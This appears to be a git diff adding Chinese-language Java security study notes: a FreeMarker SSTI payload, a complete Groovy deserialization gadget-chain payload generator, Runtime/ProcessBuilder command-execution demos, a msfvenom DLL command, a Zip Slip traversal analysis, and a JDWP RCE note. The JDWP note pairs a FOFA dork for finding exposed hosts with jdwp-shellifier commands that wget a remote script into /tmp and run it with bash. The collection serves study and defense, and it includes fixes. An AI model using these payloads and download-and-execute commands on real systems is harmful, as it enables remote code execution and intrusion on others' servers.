value="freemarker.template.utility.ObjectConstructor"?new()>${value("java.lang.ProcessBuilder","calc.exe").start()} +``` diff --git a/javaee/template engine/groovy/README.md b/javaee/template engine/groovy/README.md new file mode 100644 index 00000000..bf6c8fee --- /dev/null +++ b/javaee/template engine/groovy/README.md @@ -0,0 +1,214 @@ +- 测试Grovvy 版本 v2.3.9 + + +### InvocationHandler 接口 + +![image-20211108103208739](source-analysis.assets/image-20211108103208739-16395903238381.png) + +#### AnnotationInvocationHandler 类 + +- 实现了InvocaHandler接口 + +![image-20211215232032453](source-analysis.assets/image-20211215232032453-16395903266652.png) + +##### 构造方法 AnnotationInvocationHandler + +- sun.reflect.annotation.AnnotationInvocationHandler#AnnotationInvocationHandler + - 参数 + - Annotation 类型 + - Map 类型 + +![image-20211215234351142](source-analysis.assets/image-20211215234351142-16395903291333.png) + +##### 成员方法 readObject + +- sun.reflect.annotation.AnnotationInvocationHandler#readObject + - 该方法被反序列化时一定会被调用 + +![image-20211215232209050](source-analysis.assets/image-20211215232209050-16395903359864.png) + +361行:执行了memberValues 属性的 entrySet 方法。 + +##### 属性 memberValues + +- sun.reflect.annotation.AnnotationInvocationHandler#memberValues + +#### ConversionHandler 类 + +- 实现了 InvocationHandler接口 + +![image-20211108103242423](source-analysis.assets/image-20211108103242423.png) + +##### 成员方法 invoke + +![image-20211108103517041](source-analysis.assets/image-20211108103517041.png) + +#### ConvertedClosure 类 + +- 这个类是一个通用的适配器,用来适配一个闭包到任意的Java接口 + +![image-20211108103833882](source-analysis.assets/image-20211108103833882.png) + +##### 成员方法 invokeCustom + +- org.codehaus.groovy.runtime.ConvertedClosure#invokeCustom + - ConvertedClosure的method参数必须等于触发动态代理时调用的方法名 + +![image-20211108103854979](source-analysis.assets/image-20211108103854979.png) + +### Closure 抽象类 + +![image-20211215233015850](source-analysis.assets/image-20211215233015850.png) + +#### MethodClosure 类 + +- org.codehaus.groovy.runtime.MethodClosure + - 使用一个闭包表示的一个类上的方法,这个方法可以在任何时候被调用 + +![image-20211214204856501](source-analysis.assets/image-20211214204856501.png) + +##### 成员方法 doCall + +- 通过方法 `InvokerHelper.invokeMethod()` 进行方法调用 + +```java +package groovy; + +import org.codehaus.groovy.runtime.MethodClosure; +import java.lang.reflect.InvocationTargetException; +import java.lang.reflect.Method; + +public class doCall { + public static void main(String[] args) throws NoSuchMethodException, InvocationTargetException, IllegalAccessException { + MethodClosure methodClosure = new MethodClosure(Runtime.getRuntime(), "exec"); + Method doCallM = MethodClosure.class.getDeclaredMethod("doCall", Object.class); + doCallM.setAccessible(true); + doCallM.invoke(methodClosure, "calc"); + } +} +``` + +可反射调用执行系统命令,如下图: + +![image-20211215225939460](source-analysis.assets/image-20211215225939460.png) + + + + + +前置知识 + +- Groovy执行命令的语法:`"command".execute()` + +- 当通过动态代理对象调用一个方法时候,该方法的调用就会被转发到实现InvocationHandler接口类的invoke方法来调用 + +- newProxyInstance方法的三个参数: + + - loader: 用哪个类加载器去加载代理对象 + - interfaces: 动态代理类需要实现的接口 + + - h: 动态代理方法在执行时,会调用h里面的invoke方法去执行 + + + +构造payload + +```java +// 对cmd字符串执行execute命令的闭包 +MethodClosure methodClosure = new MethodClosure(cmd,"execute"); +// 适配entrySet方法的ConvertedClosure闭包 +ConvertedClosure closure = new ConvertedClosure(methodClosure,"entrySet"); +// 创建动态代理 +Map mapProxy = (Map) Proxy.newProxyInstance(Groovy_entrySet.class.getClassLoader(), new Class< ?>[] { Map.class }, closure); +// 创建AnnotationInvocationHandler实例(通过反射) +Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); +Constructor constructor = clazz.getDeclaredConstructors()[0]; +constructor.setAccessible(true); +Object annotationInvocationHandler = constructor.newInstance(Retention.class, mapProxy); +``` + +解释如下: + +当annotationInvocationHandler对象的序列化数据被反序列化时,会调用readObject() + +- readObject() 调用 memberValues.entrySet() + - ConversionHandler.Invoke() 调用 ConvertedClosure.invokeCustom() + - getDelegate()).call() 调用 getMetaClass().invokeMethod() // 递归调用 + - method.doMethodInvoke() 调用 ProcessGroovyMethods.execute() + - Runtime.getRuntime().exec() + +最终gadget如下 + +```java +import java.io.*; +import java.lang.reflect.Proxy; +import java.util.Map; +import java.lang.reflect.Constructor; +import java.lang.annotation.Retention; + +import org.codehaus.groovy.runtime.ConvertedClosure; +import org.codehaus.groovy.runtime.MethodClosure; + +public class Groovy_entrySet { + public static void main(String[] args){ + Groovy_entrySet.generatePayload("calc"); + } + public static void generatePayload(String cmd){ + try{ + MethodClosure methodClosure = new MethodClosure(cmd,"execute"); + ConvertedClosure closure = new ConvertedClosure(methodClosure,"entrySet"); + Map mapProxy = (Map) Proxy.newProxyInstance(Groovy_entrySet.class.getClassLoader(), new Class< ?>[] { Map.class }, closure); + Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); + Constructor constructor = clazz.getDeclaredConstructors()[0]; + constructor.setAccessible(true); + Object annotationInvocationHandler = constructor.newInstance(Retention.class, mapProxy); + ByteArrayOutputStream byteArray = new ByteArrayOutputStream(); + ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArray); + objectOutputStream.writeObject(annotationInvocationHandler); + objectOutputStream.close(); + /** + * 笔记:打印字节数组 + * System.out.print(Arrays.toString(data)); + */ + byte[] data = byteArray.toByteArray(); + // 将字节数组反序列化为对象 + ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(data); + ObjectInputStream objectInputStream = new ObjectInputStream(byteArrayInputStream); + objectInputStream.readObject(); + objectInputStream.close(); + } catch (Exception e) { + e.printStackTrace(); + } + } +} +``` + +测试效果 + +![image-20211216014448682](source-analysis.assets/image-20211216014448682.png) + +调用栈 + +```java +execute:530, ProcessGroovyMethods (org.codehaus.groovy.runtime) +doMethodInvoke:-1, dgm748ドル (org.codehaus.groovy.runtime) +invokeMethod:1207, MetaClassImpl (groovy.lang) +invokeMethod:1074, MetaClassImpl (groovy.lang) +invokeMethod:1016, MetaClassImpl (groovy.lang) +call:423, Closure (groovy.lang) +invokeCustom:51, ConvertedClosure (org.codehaus.groovy.runtime) +invoke:103, ConversionHandler (org.codehaus.groovy.runtime) +entrySet:-1, $Proxy0 (com.sun.proxy) +readObject:452, AnnotationInvocationHandler (sun.reflect.annotation) +invoke0:-1, NativeMethodAccessorImpl (sun.reflect) +invoke:62, NativeMethodAccessorImpl (sun.reflect) +invoke:43, DelegatingMethodAccessorImpl (sun.reflect) +invoke:498, Method (java.lang.reflect) +invokeReadObject:1058, ObjectStreamClass (java.io) +readSerialData:2122, ObjectInputStream (java.io) +readOrdinaryObject:2013, ObjectInputStream (java.io) +readObject0:1535, ObjectInputStream (java.io) +readObject:422, ObjectInputStream (java.io) +generatePayload:37, Groovy_entrySet (groovy) +main:14, Groovy_entrySet (groovy) +``` diff --git a/javaee/template engine/groovy/source-analysis.assets/image-20211108103208739-16395903238381.png b/javaee/template engine/groovy/source-analysis.assets/image-20211108103208739-16395903238381.png new file mode 100644 index 00000000..b5c7d3ac Binary files /dev/null and b/javaee/template engine/groovy/source-analysis.assets/image-20211108103208739-16395903238381.png differ diff --git a/javaee/template engine/groovy/source-analysis.assets/image-20211108103242423.png b/javaee/template engine/groovy/source-analysis.assets/image-20211108103242423.png new file mode 100644 index 00000000..a7d9ecc8 Binary files /dev/null and b/javaee/template engine/groovy/source-analysis.assets/image-20211108103242423.png differ diff --git a/javaee/template engine/groovy/source-analysis.assets/image-20211108103517041.png b/javaee/template engine/groovy/source-analysis.assets/image-20211108103517041.png new file mode 100644 index 00000000..8481e47b Binary files /dev/null and b/javaee/template engine/groovy/source-analysis.assets/image-20211108103517041.png differ diff --git a/javaee/template engine/groovy/source-analysis.assets/image-20211108103833882.png b/javaee/template engine/groovy/source-analysis.assets/image-20211108103833882.png new file mode 100644 index 00000000..39188c3c Binary files /dev/null and b/javaee/template engine/groovy/source-analysis.assets/image-20211108103833882.png differ diff --git a/javaee/template engine/groovy/source-analysis.assets/image-20211108103854979.png b/javaee/template engine/groovy/source-analysis.assets/image-20211108103854979.png new file mode 100644 index 00000000..c84c0409 Binary files /dev/null and b/javaee/template engine/groovy/source-analysis.assets/image-20211108103854979.png differ diff --git a/javaee/template engine/groovy/source-analysis.assets/image-20211214204856501.png b/javaee/template engine/groovy/source-analysis.assets/image-20211214204856501.png new file mode 100644 index 00000000..5244a75b Binary files /dev/null and b/javaee/template engine/groovy/source-analysis.assets/image-20211214204856501.png differ diff --git a/javaee/template engine/groovy/source-analysis.assets/image-20211215225939460.png b/javaee/template engine/groovy/source-analysis.assets/image-20211215225939460.png new file mode 100644 index 00000000..5047c59b Binary files /dev/null and b/javaee/template engine/groovy/source-analysis.assets/image-20211215225939460.png differ diff --git a/javaee/template engine/groovy/source-analysis.assets/image-20211215232032453-16395903266652.png b/javaee/template engine/groovy/source-analysis.assets/image-20211215232032453-16395903266652.png new file mode 100644 index 00000000..7f5a7e38 Binary files /dev/null and b/javaee/template engine/groovy/source-analysis.assets/image-20211215232032453-16395903266652.png differ diff --git a/javaee/template engine/groovy/source-analysis.assets/image-20211215232209050-16395903359864.png b/javaee/template engine/groovy/source-analysis.assets/image-20211215232209050-16395903359864.png new file mode 100644 index 00000000..c9a50da6 Binary files /dev/null and b/javaee/template engine/groovy/source-analysis.assets/image-20211215232209050-16395903359864.png differ diff --git a/javaee/template engine/groovy/source-analysis.assets/image-20211215233015850.png b/javaee/template engine/groovy/source-analysis.assets/image-20211215233015850.png new file mode 100644 index 00000000..0b637089 Binary files /dev/null and b/javaee/template engine/groovy/source-analysis.assets/image-20211215233015850.png differ diff --git a/javaee/template engine/groovy/source-analysis.assets/image-20211215234351142-16395903291333.png b/javaee/template engine/groovy/source-analysis.assets/image-20211215234351142-16395903291333.png new file mode 100644 index 00000000..e0979db0 Binary files /dev/null and b/javaee/template engine/groovy/source-analysis.assets/image-20211215234351142-16395903291333.png differ diff --git a/javaee/template engine/groovy/source-analysis.assets/image-20211216014448682.png b/javaee/template engine/groovy/source-analysis.assets/image-20211216014448682.png new file mode 100644 index 00000000..ee4b5bce Binary files /dev/null and b/javaee/template engine/groovy/source-analysis.assets/image-20211216014448682.png differ diff --git a/javaee/template engine/velocity/README.md b/javaee/template engine/velocity/README.md new file mode 100644 index 00000000..dfbe607b --- /dev/null +++ b/javaee/template engine/velocity/README.md @@ -0,0 +1,2 @@ + +[0x02-模板引擎-velocity](https://pen4uin.github.io/post/22-10-01-confluence-ssti-via-velocity/#0x02-%E6%A8%A1%E6%9D%BF%E5%BC%95%E6%93%8E-velocity) diff --git a/javaee/vulnerability/README.md b/javaee/vulnerability/README.md new file mode 100644 index 00000000..77da955f --- /dev/null +++ b/javaee/vulnerability/README.md @@ -0,0 +1,319 @@ +## 基础篇 +### 系统属性 + +常与System.getProperty()、System.getProperties()方法搭配使用 + +``` +java.version Java 运行时环境版本 +java.vendor Java 运行时环境供应商 +java.vendor.url Java 供应商的 URL +java.vm.specification.version Java 虚拟机规范版本 +java.vm.specification.vendor Java 虚拟机规范供应商 +java.vm.specification.name Java 虚拟机规范名称 +java.vm.version Java 虚拟机实现版本 +java.vm.vendor Java 虚拟机实现供应商 +java.vm.name Java 虚拟机实现名称 +java.specification.version Java 运行时环境规范版本 +java.specification.vendor Java 运行时环境规范供应商 +java.specification.name Java 运行时环境规范名称 +os.name 操作系统的名称 +os.arch 操作系统的架构 +os.version 操作系统的版本 +file.separator 文件分隔符(在 UNIX 系统中是" / ") +path.separator 路径分隔符(在 UNIX 系统中是" : ") +line.separator 行分隔符(在 UNIX 系统中是" /n ") +java.home Java 安装目录 +java.class.version Java 类格式版本号 +java.class.path Java 类路径 +java.library.path 加载库时搜索的路径列表 +java.io.tmpdir 默认的临时文件路径 +java.compiler 要使用的 JIT 编译器的名称 +java.ext.dirs 一个或多个扩展目录的路径 +user.name 用户的账户名称 +user.home 用户的主目录 +user.dir 用户当前工作目录 +``` + +## 漏洞篇 + +### Command Execution 命令执行 + +Java下几种执行命令的方式 + +- java.lang.Runtime + - exec() + - load() +- java.lang.ProcessBuilder +- java.lang.ProcessImpl +- JNI(暂放) + +#### java.lang.Runtime + +##### exec() + +测试代码 + +```java +import java.io.IOException; + +public class CE01 { + public static void main(String[] args) throws IOException { + Runtime.getRuntime().exec("calc"); + } +} +``` + +测试效果 + +![image-20220119163614488](img/image-20220119163614488.png) + +调用栈 + +``` +create:-1, ProcessImpl (java.lang) +:386, ProcessImpl (java.lang) +start:137, ProcessImpl (java.lang) +start:1029, ProcessBuilder (java.lang) +exec:620, Runtime (java.lang) +exec:450, Runtime (java.lang) +exec:347, Runtime (java.lang) +main:6, CE01 (CommandExecution.Runtime) +``` + + + +##### load() + +- 加载动态链接库,如linux下的so文件,windows下的dll文件。 + +准备dll - 弹计算器 + +``` +msfvenom -p windows/x64/exec --platform win -a x64 CMD=calc.exe EXITFUNC=thread -f dll> calc.dll +``` + +![image-20211108002026565](img/image-20211108002026565.png) + +测试代码 + +```java +package CommandExecution.Runtime; + +public class CE00 { + public static void main(String[] args) { + Runtime rt = Runtime.getRuntime(); + rt.load("F:\\Java_Sec\\java\\java_vuln\\src\\main\\java\\CommandExecution\\Runtime\\calc.dll"); + } +} +``` + +测试效果 + +![image-20220120170955546](img/image-20220120170955546.png) + +#### java.lang.ProcessBuilder + +测试代码 + +```java +import java.io.IOException; + +public class CE02 { + public static void main(String[] args) throws IOException { + ProcessBuilder pb = new ProcessBuilder("calc"); + Process process = pb.start(); + System.out.println(process); + } +} +``` + +测试效果 + +![image-20220119164953772](img/image-20220119164953772.png) + +调用栈 + +```java +create:-1, ProcessImpl (java.lang) +:386, ProcessImpl (java.lang) +start:137, ProcessImpl (java.lang) +start:1029, ProcessBuilder (java.lang) +main:7, CE02 (CommandExecution.ProcessBuilder) +``` + +#### java.lang.ProcessImpl + +测试代码 + +```java +import java.lang.reflect.Method; +import java.util.Map; + +public class CE03 { + public static void main(String[] args) throws Exception{ + /** + * 反射调用 java.lang.ProcessImpl#start(java.lang.String[], java.util.Map, java.lang.String, java.lang.ProcessBuilder.Redirect[], boolean) + */ + Class clazz = Class.forName("java.lang.ProcessImpl"); + Method start = clazz.getDeclaredMethod("start", String[].class, Map.class, String.class, ProcessBuilder.Redirect[].class, boolean.class); + start.setAccessible(true); + start.invoke(null, new String[]{"calc"}, null, null, null, false); + } +} +``` + +测试效果 + +![image-20220120171337998](img/image-20220120171337998.png) + + + +调用栈 + +```java +create:-1, ProcessImpl (java.lang) +:386, ProcessImpl (java.lang) +start:137, ProcessImpl (java.lang) +invoke0:-1, NativeMethodAccessorImpl (sun.reflect) +invoke:62, NativeMethodAccessorImpl (sun.reflect) +invoke:43, DelegatingMethodAccessorImpl (sun.reflect) +invoke:498, Method (java.lang.reflect) +main:14, CE03 (CommandExecution.ProcessImpl) +``` + +#### JNI +(暂放) + +### Zip Slip + +#### zt-zip v1.1.12 + +测试环境 + +- https://github.com/cesarsotovalero/zip-slip-exploit-example + + +测试效果 + +> 正常压缩文件 + +normalCompressed.zip + + ![image-20220215152128829](img/image-20220215152128829.png) + +解压路径 + +``` +F:\Java_Sec\vuln_projects\zip-slip-demo\target\example\upload\flag.txt +``` + + + +> 恶意压缩文件 + +evilCompressed.zip + + ![image-20220215152156507](img/image-20220215152156507.png) + +payload + +``` +../../../../../../../../../../../../../../../../../../../../../../../../tmp/flag.txt +``` + +解压路径 + +``` +# 目录成功穿越到根目录 +F:\tmp\flag.txt +``` + + ![image-20220215152949881](img/image-20220215152949881.png) + + + +漏洞分析 + +![image-20220215153502354](img/image-20220215153502354.png) + +- 判断文件是否为 .zip 后缀 +- 调用 org.zeroturnaround.zip.ZipUtil#unpack 进行解压缩 + +调用栈 + +```java +process:1150, ZipUtil$Unpacker (org.zeroturnaround.zip) +iterate:508, ZipUtil (org.zeroturnaround.zip) +iterate:472, ZipUtil (org.zeroturnaround.zip) +unpack:996, ZipUtil (org.zeroturnaround.zip) +unpack:939, ZipUtil (org.zeroturnaround.zip) +doPost:56, UploadServlet (se.kth.servlet) +... +``` + +![image-20220215153915204](img/image-20220215153915204.png) + +- 执行到org.zeroturnaround.zip.ZipUtil.Unpacker#process方法,调用 java.util.zip.ZipEntry#getName 获取 entry 的 name + +- 与`outputDir` 进行拼接创建一个 File 实例 `file` + + - 未对获取到的路径进行校验 + + ![image-20220215155935625](img/image-20220215155935625.png) + +- 最后调用org.zeroturnaround.zip.commons.FileUtils#copy 将输入流复制到实例`file`(写入文件)。 + + + +漏洞修复 + +pom.xml + +```xml + + org.zeroturnaround + zt-zip + 1.13 + jar + +``` + + + +![image-20220215162206252](img/image-20220215162206252.png) + +在文件写入之前,进行了两处判断 + +- `name` 中是否出现了 `··` +- `file` 的规范路径名的前缀是否为 `outputDir` 的规范路径名 + - getCanonicalPath() + - 返回绝对唯一的标准规范路径名,即会删除路径中的 `.` 和 `..` 。 + - 会解析软链接(在UNIX平台上) + + + +> ps:感觉这里在Linux平台上可以利用 条件竞争 + 软链接 进行绕过(实战意义不大、积累思路) + + + + + + + +ref: + +- https://github.com/snyk/zip-slip-vulnerability +- https://github.com/cesarsotovalero/zip-slip-exploit-example + +### EL Injection + +- [01 Java表达式注入的武器化利用](https://yzddmr6.com/posts/java-expression-exploit/) + + + + + + + + + diff --git a/javaee/vulnerability/img/image-20211108002026565.png b/javaee/vulnerability/img/image-20211108002026565.png new file mode 100644 index 00000000..f3011482 Binary files /dev/null and b/javaee/vulnerability/img/image-20211108002026565.png differ diff --git a/javaee/vulnerability/img/image-20220119163614488.png b/javaee/vulnerability/img/image-20220119163614488.png new file mode 100644 index 00000000..0a20f4ae Binary files /dev/null and b/javaee/vulnerability/img/image-20220119163614488.png differ diff --git a/javaee/vulnerability/img/image-20220119164953772.png b/javaee/vulnerability/img/image-20220119164953772.png new file mode 100644 index 00000000..cee97597 Binary files /dev/null and b/javaee/vulnerability/img/image-20220119164953772.png differ diff --git a/javaee/vulnerability/img/image-20220119172348169.png b/javaee/vulnerability/img/image-20220119172348169.png new file mode 100644 index 00000000..7c6b7da7 Binary files /dev/null and b/javaee/vulnerability/img/image-20220119172348169.png differ diff --git a/javaee/vulnerability/img/image-20220120170955546.png b/javaee/vulnerability/img/image-20220120170955546.png new file mode 100644 index 00000000..1c2833f2 Binary files /dev/null and b/javaee/vulnerability/img/image-20220120170955546.png differ diff --git a/javaee/vulnerability/img/image-20220120171337998.png b/javaee/vulnerability/img/image-20220120171337998.png new file mode 100644 index 00000000..f3b44250 Binary files /dev/null and b/javaee/vulnerability/img/image-20220120171337998.png differ diff --git a/javaee/vulnerability/img/image-20220215152128829.png b/javaee/vulnerability/img/image-20220215152128829.png new file mode 100644 index 00000000..ae32dd31 Binary files /dev/null and b/javaee/vulnerability/img/image-20220215152128829.png differ diff --git a/javaee/vulnerability/img/image-20220215152156507.png b/javaee/vulnerability/img/image-20220215152156507.png new file mode 100644 index 00000000..c329cd13 Binary files /dev/null and b/javaee/vulnerability/img/image-20220215152156507.png differ diff --git a/javaee/vulnerability/img/image-20220215152949881.png b/javaee/vulnerability/img/image-20220215152949881.png new file mode 100644 index 00000000..18b4aa99 Binary files /dev/null and b/javaee/vulnerability/img/image-20220215152949881.png differ diff --git a/javaee/vulnerability/img/image-20220215153502354.png b/javaee/vulnerability/img/image-20220215153502354.png new file mode 100644 index 00000000..cb55460e Binary files /dev/null and b/javaee/vulnerability/img/image-20220215153502354.png differ diff --git a/javaee/vulnerability/img/image-20220215153915204.png b/javaee/vulnerability/img/image-20220215153915204.png new file mode 100644 index 00000000..2c816390 Binary files /dev/null and b/javaee/vulnerability/img/image-20220215153915204.png differ diff --git a/javaee/vulnerability/img/image-20220215154950054.png b/javaee/vulnerability/img/image-20220215154950054.png new file mode 100644 index 00000000..f5cbac70 Binary files /dev/null and b/javaee/vulnerability/img/image-20220215154950054.png differ diff --git a/javaee/vulnerability/img/image-20220215155935625.png b/javaee/vulnerability/img/image-20220215155935625.png new file mode 100644 index 00000000..0411c087 Binary files /dev/null and b/javaee/vulnerability/img/image-20220215155935625.png differ diff --git a/javaee/vulnerability/img/image-20220215162206252.png b/javaee/vulnerability/img/image-20220215162206252.png new file mode 100644 index 00000000..b4b31dea Binary files /dev/null and b/javaee/vulnerability/img/image-20220215162206252.png differ diff --git a/javaee/vulnerability/jdwp rce.md b/javaee/vulnerability/jdwp rce.md new file mode 100644 index 00000000..7a1c5adf --- /dev/null +++ b/javaee/vulnerability/jdwp rce.md @@ -0,0 +1,52 @@ +> Created:2021年10月17日 17:54 + +### 漏洞简介 +JDWP(Java DEbugger Wire Protocol):即Java调试线协议,是一个为Java调试而设计的通讯交互协议,它定义了调试器和被调试程序之间传递的信息的格式。说白了就是JVM或者类JVM的虚拟机都支持一种协议,通过该协议,Debugger 端可以和 target VM 通信,可以获取目标 VM的包括类、对象、线程等信息,在调试Android应用程序这一场景中,Debugger一般是指你的 develop machine 的某一支持 JDWP协议的工具例如 Android Studio 或者 JDB,而 Target JVM是指运行在你mobile设备当中的各个App(因为它们都是一个个虚拟机 Dalvik 或者 ART),JDWP Agent一般负责监听某一个端口,当有 Debugger向这一个端口发起请求的时候,Agent 就转发该请求给 target JVM并最终由该 JVM 来处理请求,并把 reply 信息返回给 Debugger 端。 + +### 漏洞复现 + +FoFa Dork: + +> banner="JDWP-Handshake" + + +![image](https://user-images.githubusercontent.com/55024146/161269239-6315e359-6e6e-475c-93ca-b15348ea4748.png) + + +``` +python2 .\jdwp-shellifier.py -t 62.x.x.x -p 8000 --cmd "ping xxxxx.dnslog.cn -c2" +``` + +![image](https://user-images.githubusercontent.com/55024146/161269453-16716b2d-b843-4d87-98e5-bf8d324d11fc.png) + +此时,找到相应WEB网站访问 + +![image](https://user-images.githubusercontent.com/55024146/161269588-3484b430-177c-4cb2-b367-abe3714c08e8.png) + +![image](https://user-images.githubusercontent.com/55024146/161269685-238b7aaa-879a-40cd-ba43-e75b807121d4.png) + +触发 + +![image](https://user-images.githubusercontent.com/55024146/161269779-ee51ae56-756d-4493-9c63-21d9d98b3356.png) + +测试截图 + +![image](https://user-images.githubusercontent.com/55024146/161269896-7a791529-aa51-4e57-9f72-27fc00edce47.png) + +### 漏洞利用 + +- 反弹shell + - jdwp-shellifier.py -t 目标IP -p 端口 --cmd "wget http://x.x.x.x/x.txt -O /tmp/x.sh" + - jdwp-shellifier.py -t 目标IP -p 端口 --cmd "bash /tmp/x.sh" + +- 写入webshell + +### 漏洞防御 + +- 关闭JDWP端口,或者JDWP端口不对公网开放 + - 所以内网渗透时可以注意一下 +_+ +- 关闭Java的debug模式(开启该模式对服务器性能有影响) + + +参考资料 +- https://github.com/IOActive/jdwp-shellifier diff --git a/mechanism/databinding/README.md b/mechanism/databinding/README.md new file mode 100644 index 00000000..106a9e0e --- /dev/null +++ b/mechanism/databinding/README.md @@ -0,0 +1,3 @@ +相关漏洞 +- [ ] Spring Framework CVE-2022-22965 +- [ ] Spring Framework CVE-2010-1622 \ No newline at end of file diff --git a/mechanism/serialization/fastjson/note/img/32e2b52cedb344d5be39ed880c30e134.png b/mechanism/serialization/fastjson/note/img/32e2b52cedb344d5be39ed880c30e134.png new file mode 100644 index 00000000..1d1034ce Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/32e2b52cedb344d5be39ed880c30e134.png differ diff --git a/mechanism/serialization/fastjson/note/img/41a2f918a49c41b7ac62521bafa778cb.png b/mechanism/serialization/fastjson/note/img/41a2f918a49c41b7ac62521bafa778cb.png new file mode 100644 index 00000000..3aad3daf Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/41a2f918a49c41b7ac62521bafa778cb.png differ diff --git a/mechanism/serialization/fastjson/note/img/4a81b196a3ef4e4b9e172a4a52e1acaf.png b/mechanism/serialization/fastjson/note/img/4a81b196a3ef4e4b9e172a4a52e1acaf.png new file mode 100644 index 00000000..a9f955eb Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/4a81b196a3ef4e4b9e172a4a52e1acaf.png differ diff --git a/mechanism/serialization/fastjson/note/img/851600c7f7064b3880112b15398e90cc.png b/mechanism/serialization/fastjson/note/img/851600c7f7064b3880112b15398e90cc.png new file mode 100644 index 00000000..6fd52650 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/851600c7f7064b3880112b15398e90cc.png differ diff --git a/mechanism/serialization/fastjson/note/img/93afd2976fce487d85794a41f6700d65.png b/mechanism/serialization/fastjson/note/img/93afd2976fce487d85794a41f6700d65.png new file mode 100644 index 00000000..32d7e441 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/93afd2976fce487d85794a41f6700d65.png differ diff --git a/mechanism/serialization/fastjson/note/img/96fe4f4cf45e4c5f90be821790f7f886.png b/mechanism/serialization/fastjson/note/img/96fe4f4cf45e4c5f90be821790f7f886.png new file mode 100644 index 00000000..e00fcf56 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/96fe4f4cf45e4c5f90be821790f7f886.png differ diff --git a/mechanism/serialization/fastjson/note/img/b10c111ecfdc47dbae548a7399f87d6c.png b/mechanism/serialization/fastjson/note/img/b10c111ecfdc47dbae548a7399f87d6c.png new file mode 100644 index 00000000..107da599 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/b10c111ecfdc47dbae548a7399f87d6c.png differ diff --git a/mechanism/serialization/fastjson/note/img/b3b9433c7dbc44f996f5b3f62dddab12.png b/mechanism/serialization/fastjson/note/img/b3b9433c7dbc44f996f5b3f62dddab12.png new file mode 100644 index 00000000..8621ddbc Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/b3b9433c7dbc44f996f5b3f62dddab12.png differ diff --git a/mechanism/serialization/fastjson/note/img/b942e530762240f5958692b6ce15a035.png b/mechanism/serialization/fastjson/note/img/b942e530762240f5958692b6ce15a035.png new file mode 100644 index 00000000..83f33bab Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/b942e530762240f5958692b6ce15a035.png differ diff --git a/mechanism/serialization/fastjson/note/img/dbda66813d5f44b5907b320492185242.png b/mechanism/serialization/fastjson/note/img/dbda66813d5f44b5907b320492185242.png new file mode 100644 index 00000000..bd61509e Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/dbda66813d5f44b5907b320492185242.png differ diff --git a/mechanism/serialization/fastjson/note/img/dcf784b91c1549b3bb3a38dee5f28511.png b/mechanism/serialization/fastjson/note/img/dcf784b91c1549b3bb3a38dee5f28511.png new file mode 100644 index 00000000..f6f24a2a Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/dcf784b91c1549b3bb3a38dee5f28511.png differ diff --git a/mechanism/serialization/fastjson/note/img/eaaa5eee918f49238b531632a1b3eb76.png b/mechanism/serialization/fastjson/note/img/eaaa5eee918f49238b531632a1b3eb76.png new file mode 100644 index 00000000..082fcf27 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/eaaa5eee918f49238b531632a1b3eb76.png differ diff --git a/mechanism/serialization/fastjson/note/img/f9f936a04b554b6482f90ec8e5b020c7.png b/mechanism/serialization/fastjson/note/img/f9f936a04b554b6482f90ec8e5b020c7.png new file mode 100644 index 00000000..e70ea19b Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/f9f936a04b554b6482f90ec8e5b020c7.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220108230455188.png b/mechanism/serialization/fastjson/note/img/image-20220108230455188.png new file mode 100644 index 00000000..e56f22bc Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220108230455188.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220108231345721.png b/mechanism/serialization/fastjson/note/img/image-20220108231345721.png new file mode 100644 index 00000000..58dcec94 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220108231345721.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110010458402.png b/mechanism/serialization/fastjson/note/img/image-20220110010458402.png new file mode 100644 index 00000000..adaad96f Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110010458402.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110010946944.png b/mechanism/serialization/fastjson/note/img/image-20220110010946944.png new file mode 100644 index 00000000..044bc7d0 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110010946944.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110011301258.png b/mechanism/serialization/fastjson/note/img/image-20220110011301258.png new file mode 100644 index 00000000..f0fc889c Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110011301258.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110011637089.png b/mechanism/serialization/fastjson/note/img/image-20220110011637089.png new file mode 100644 index 00000000..d48e4a13 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110011637089.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110012516629.png b/mechanism/serialization/fastjson/note/img/image-20220110012516629.png new file mode 100644 index 00000000..daa9104e Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110012516629.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110013037847.png b/mechanism/serialization/fastjson/note/img/image-20220110013037847.png new file mode 100644 index 00000000..77b229cc Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110013037847.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110013253942.png b/mechanism/serialization/fastjson/note/img/image-20220110013253942.png new file mode 100644 index 00000000..7cf3e410 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110013253942.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110014102136.png b/mechanism/serialization/fastjson/note/img/image-20220110014102136.png new file mode 100644 index 00000000..022ab62b Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110014102136.png differ diff --git 